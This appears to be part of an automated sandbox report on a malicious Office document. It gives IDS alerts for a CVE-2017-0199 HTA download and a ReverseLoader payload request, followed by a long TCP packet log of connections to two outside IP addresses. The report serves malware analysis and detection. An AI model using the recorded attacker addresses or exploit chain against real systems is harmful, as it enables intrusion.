                                                                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-12-13T17:48:08.070576+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224916423.95.235.2980TCP
                                                                2024-12-13T17:48:08.070614+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)123.95.235.2980192.168.2.2249164TCP
                                                                2024-12-13T17:48:13.915589+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224916623.95.235.2980TCP
                                                                2024-12-13T17:48:13.915656+01002024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)123.95.235.2980192.168.2.2249166TCP
                                                                2024-12-13T17:48:20.505425+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.224916723.95.235.2980TCP
                                                                2024-12-13T17:48:35.714214+01002024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl1192.168.2.224917323.95.235.2980TCP
                                                                2024-12-13T17:48:52.541110+01002049038ET MALWARE ReverseLoader Reverse Base64 Loader In Image M21151.101.193.137443192.168.2.2249174TCP
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Dec 13, 2024 17:48:04.016479015 CET49163443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:04.016504049 CET44349163170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:04.016660929 CET49163443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:04.041254997 CET49163443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:04.041265965 CET44349163170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:05.486177921 CET44349163170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:05.486259937 CET49163443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:05.492170095 CET49163443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:05.492207050 CET44349163170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:05.492563963 CET44349163170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:05.492614031 CET49163443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:05.572165012 CET49163443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:05.615339041 CET44349163170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:06.803738117 CET44349163170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:06.803864002 CET44349163170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:06.803872108 CET49163443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:06.803927898 CET49163443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:06.805175066 CET49163443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:06.805206060 CET44349163170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:06.820404053 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:06.941659927 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:06.941802979 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:06.942019939 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:07.062105894 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.070453882 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.070478916 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.070492029 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.070575953 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.070576906 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.070614100 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.070626020 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.070637941 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.070652008 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.070686102 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.070686102 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.070686102 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.070754051 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.070770025 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.070776939 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.070930958 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.076900005 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.190907001 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.191004038 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.191042900 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.191181898 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.262723923 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.262862921 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.262913942 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.262913942 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.266974926 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.267060041 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.267101049 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.267159939 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.275428057 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.275521040 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.275527954 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.275577068 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.283790112 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.283850908 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.284029007 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.284080029 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.292192936 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.292275906 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.292300940 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.292344093 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.300724983 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.300775051 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.300797939 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.300821066 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.309202909 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.309223890 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.309273005 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.309273005 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.317559958 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.317586899 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.317698002 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.325933933 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.326045036 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.326050997 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.326330900 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.334407091 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.334501028 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.334638119 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.335026026 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.342113972 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.342266083 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.342293978 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.342349052 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.454963923 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.455209017 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.455656052 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.455766916 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.458925009 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.459017992 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.459018946 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.459332943 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.464692116 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.464716911 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.464796066 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.472436905 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.472560883 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.472614050 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.472614050 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.480068922 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.480200052 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.480256081 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.480256081 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.485764980 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.485784054 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.486120939 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.489851952 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.489932060 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.489957094 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.490024090 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.494663000 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.494707108 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.494736910 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.495214939 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.499478102 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.499528885 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.499577045 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.499577045 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.504390001 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.504522085 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.504539967 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.504837036 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.509114027 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.509179115 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.509248972 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.509676933 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.513941050 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.513981104 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.514035940 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.514035940 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.518263102 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.518301964 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.518853903 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.518923998 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.518933058 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.519139051 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.523813963 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.523984909 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.524009943 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.524029970 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.528455973 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.528512001 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.528529882 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.528589010 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.533230066 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.533308029 CET804916423.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:08.533319950 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:08.533658028 CET4916480192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:09.687510967 CET49165443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:09.687573910 CET44349165170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:09.687669992 CET49165443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:09.699515104 CET49165443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:09.699532986 CET44349165170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:11.332799911 CET44349165170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:11.332961082 CET49165443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:11.338135004 CET49165443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:11.338155031 CET44349165170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:11.338624954 CET44349165170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:11.338731050 CET49165443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:11.405998945 CET49165443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:11.451324940 CET44349165170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:12.616231918 CET44349165170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:12.616369963 CET49165443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:12.616399050 CET44349165170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:12.616456032 CET49165443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:12.616461992 CET44349165170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:12.616513014 CET49165443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:12.618520975 CET49165443192.168.2.22170.82.173.30
                                                                Dec 13, 2024 17:48:12.618552923 CET44349165170.82.173.30192.168.2.22
                                                                Dec 13, 2024 17:48:12.631257057 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:12.751622915 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:12.751923084 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:12.752082109 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:12.874092102 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:13.915497065 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:13.915549040 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:13.915563107 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:13.915589094 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:13.915589094 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:13.915637970 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:13.915656090 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:13.915669918 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:13.915682077 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:13.915695906 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:13.915720940 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:13.915720940 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:13.915786028 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:13.915900946 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:13.915915012 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:13.915971041 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:13.915998936 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:13.916047096 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:13.921844006 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.038347960 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.038372993 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.038816929 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.107547998 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.107620001 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.107693911 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.107693911 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.111702919 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.111788988 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.113260031 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.113318920 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.113351107 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.113481998 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.121826887 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.121877909 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.121891022 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.121942043 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.130309105 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.130371094 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.130381107 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.130453110 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.138876915 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.138940096 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.138977051 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.139064074 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.147413969 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.147510052 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.147524118 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.147573948 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.155982018 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.156023979 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.156054974 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.156209946 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.164570093 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.164647102 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.164676905 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.164866924 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.173013926 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.173065901 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.173197031 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.173197031 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.180984020 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.181123018 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.181163073 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.181163073 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.188719988 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.189343929 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.299740076 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.299820900 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.299869061 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.300014973 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.302158117 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.302270889 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.302283049 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.302331924 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.307152033 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.307260990 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.307267904 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.307405949 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.312103987 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.312170982 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.312212944 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.312293053 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.316905022 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.316987038 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.317076921 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.317076921 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.321618080 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.321680069 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.321780920 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.321858883 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.326416016 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.326467037 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.326587915 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.326658010 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.331264019 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.331335068 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.331376076 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.331445932 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.335901976 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.335953951 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.336090088 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.336213112 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.340662003 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.340770960 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.340814114 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.340852976 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.345453978 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.345508099 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.345614910 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.345675945 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.350215912 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.350266933 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.350331068 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.350374937 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.354990005 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.355107069 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.355125904 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.355179071 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.359710932 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.359844923 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.359846115 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.359901905 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.364603043 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.364662886 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.364821911 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.364821911 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.369554996 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.369633913 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.369646072 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.369690895 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.374046087 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.374109983 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.374181986 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.374181986 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.378659010 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.378746033 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.378752947 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.378818035 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.383434057 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.383519888 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.383548975 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.383692980 CET4916680192.168.2.2223.95.235.29
                                                                Dec 13, 2024 17:48:14.388331890 CET804916623.95.235.29192.168.2.22
                                                                Dec 13, 2024 17:48:14.388386965 CET4916680192.168.2.2223.95.235.29
